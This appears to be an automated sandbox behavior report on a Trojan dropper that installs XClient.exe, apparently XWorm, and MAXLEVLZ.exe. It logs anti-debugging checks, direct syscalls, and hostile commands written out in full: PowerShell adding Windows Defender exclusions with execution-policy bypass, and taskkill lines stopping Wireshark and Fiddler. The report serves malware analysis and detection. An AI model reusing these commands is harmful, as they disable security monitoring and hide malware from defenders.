Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: XClient.exe, 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: XClient.exe, 00000004.00000002.2705775289.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzzty

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\XClient.exe

Code function: 4_2_00007FF7BFED7163 CheckRemoteDebuggerPresent,

4_2_00007FF7BFED7163

Hides threads from debuggers

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect debuggers (CloseHandle check)

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe

Handle closed: DEADC0DE

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Roaming\XClient.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQueryInformationProcess: Direct from: 0x7FF6265F0E41	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtSetInformationThread: Direct from: 0x7FF6261053FD	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQuerySystemInformation: Direct from: 0x7FF62733C504	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtSetInformationProcess: Direct from: 0x7FF62733DD0A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF6260A4BE6	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF627302554	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQuerySystemInformation: Direct from: 0x7FF6260E4D42	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQueryInformationProcess: Direct from: 0x7FF626123884	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Indirect: 0x7FF626074C73	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQueryInformationProcess: Direct from: 0x7FF6260D09AB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtUnmapViewOfSection: Direct from: 0x7FF6260B432C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtClose: Direct from: 0x7FF6261CB689
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQuerySystemInformation: Direct from: 0x7FF6261687A0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF6260E1ADE	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF6260CB15B	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF6261CB004	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtOpenFile: Direct from: 0x7FF62615FC69	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQuerySystemInformation: Direct from: 0x7FF6260DE7B3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF62612F960	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF626129BEB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF6261AA565	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF6272B9364	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtProtectVirtualMemory: Direct from: 0x7FF6261CBFDB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	NtQuerySystemInformation: Direct from: 0x7FF626121E8B	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process created: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe "C:\Users\user\AppData\Roaming\MAXLEVLZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM HTTPDebuggerSvc.exe /F	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM HTTPDebuggerSvc.exe /F	Jump to behavior

Source: XClient.exe, 00000004.00000002.2695394174.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000004.00000002.2695394174.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: XClient.exe, 00000004.00000002.2695394174.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000004.00000002.2695394174.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: XClient.exe, 00000004.00000002.2695394174.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
